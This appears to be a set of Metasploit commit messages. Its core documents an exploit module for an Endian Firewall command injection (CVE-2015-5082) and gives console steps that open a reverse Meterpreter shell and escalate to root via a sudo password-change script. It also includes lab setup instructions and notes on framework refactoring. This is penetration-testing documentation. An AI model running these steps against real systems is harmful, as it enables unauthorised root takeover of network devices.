This commit fixes issues with specifying "rhost:rport",
replacing them instead with "peer". Also, a couple of
"Unknown" errors were replaced with "UnexpectedReply".
This module takes advantage of an authenticated HTTP RCE
vulnerability to start telnet on a random port. The module
then connects to that telnet session and returns a shell.
This vulnerability is present in version 2.01 of the firmware
and resolved by version 2.12.
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also clears a few
modules that use the HttpClient mixin with def peer.
Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:
Fix#5727Fix#5718Fix#5761
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)
Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2
Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1
Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.
Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.
Example usage / output:
```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit
[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress - 18.28% done (196/1072 bytes)
[*] Command Stager progress - 36.57% done (392/1072 bytes)
[*] Command Stager progress - 54.85% done (588/1072 bytes)
[*] Command Stager progress - 73.13% done (784/1072 bytes)
[*] Command Stager progress - 91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)
meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer : efw220.vuln.local
OS : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie
bash: no job control in this shell
bash-3.00# whoami
root
```
Steps to verify module functionality:
Go to http://sourceforge.net/projects/efw/files/Development/
Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.
Download the ISO file for that version.
Create a VM using the ISO:
For purposes of VM configuration:
- Endian is based on the RHEL/CentOS/Fedora Core Linux
distribution.
- The ISOs will create a 32-bit x86 system.
- 512MB of RAM and 4GB of disk space should be more than enough.
- Be sure to configure the VM with at least two NICs, as the Endian
setup is difficult (impossible?) to complete with less than two
network interfaces on the host.
For the Endian OS-level (Linux) installation:
- Default options are fine where applicable.
- Be sure to pick a valid IP for the "Green" network interface, as
you will use it to access a web GUI to complete the configuration
- If prompted to create a root/SSH password and/or web admin
password, make a note of them. Well, make a note of the web admin
password - the exploit module will let you change the root
password later if you want to. This step is dependent on the
version selected - some will prompt, others default the values to
"endian".
- Once the OS-level configuration is complete, access the web
interface to complete the setup. If you used 172.16.47.1 for the
"Green" interface, then the URL will be
https://172.16.47.1:10443/
- If the web interface is not accessible, reboot the VM (in some
versions, the web interface does not come up until after the
first post-installation reboot).
For the web interface-based configuration:
- If you were prompted to select an admin password, use it. If not,
the username/password is admin/endian.
- Use the second NIC for the "Red" interface. It will not actually
be used during this walkthrough, so feel free to specify a bogus
address on a different/nonexistent subnet. Same for its default
gateway.
- Once the base configuration is complete, access the main web
interface URL again.
- Switch to the Proxy tab.
- Enable the HTTP proxy.
- Click Save (or Apply, depending on version).
- If prompted to apply the settings, do so.
- Click on the Authentication sub-tab.
- Make sure the Authentication Method is Local (this should be the
default).
- Click the _manage users_ (Or _User management_, etc., depending
on version) button.
- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
- Enter "proxyuser" for the username, and "password123" for the
password, or modify the directions below this point accordingly.
- Click the _Create user_ button.
- If prompted to apply the settings, do so.
Module test process:
From within the MSF console, execute these commands:
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
Once Meterpreter connects, execute the following Meterpreter
commands:
getuid
sysinfo
shell
Within the OS shell, execute the following commands:
whoami
uname -a
sudo -l
sudo /usr/local/bin/chrootpasswd
It will appear as though the command has hung, but it is actually
waiting for input. Type "IlikerootaccessandIcannotlie", then press
enter.
Execute the following OS command in the shell:
su
Type "IlikerootaccessandIcannotlie", then press enter.
Verify root access (whoami, etc.).
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in #5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys
Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in #5192, @joevennix's module for Safari CVE-2015-1126
Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in
Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in #5016,
add SSL Labs scanner
Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in #5101, Add Directory Traversal for GoAhead Web Server
Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in #5158, OWA internal IP disclosure scanner
Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in #5159, WordPress Mobile Edition Plugin File Read Vuln
Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in #4924, @m-1-k-3's DLink CVE-2015-1187 exploit
Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in #5131, WordPress Slideshow Upload
Edited modules/exploits/windows/local/run_as.rb first landed in #4649,
improve post/windows/manage/run_as and as an exploit
(These results courtesy of a delightful git alias, here:
```
cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"
```
So that's kind of fun.
Fix#5103. By default, Httpclient will encode the URI but
we don't necessarily want that. These modules originally
didn't use URI encoding when they were written so we should
just keep them that way.
Since Ruby 2.1, the respond_to? method is more strict because it does
not check protected methods. So when you use send(), clearly you're
ignoring this type of access control. The patch is meant to preserve
this behavior to avoid potential breakage.
Resolve#4507
See #4400. This should be all of them, except for, of course, the module
that targets Redmine itself.
Note that this also updates the README.md with more current information
as well.
James Lee
Nicholas Starke
wchen-r7
Brendan Coles
Jon Hart
Brent Cook
dmohanty-r7
karllll
HD Moore
m0t
Tod Beardsley
jvazquez-r7
Christian Mehlmauer
Michael Messner
Ben Lincoln
aos
m-1-k-3
Sven Vetsch
William Vu
OJ
headlesszeke
Rasta Mouse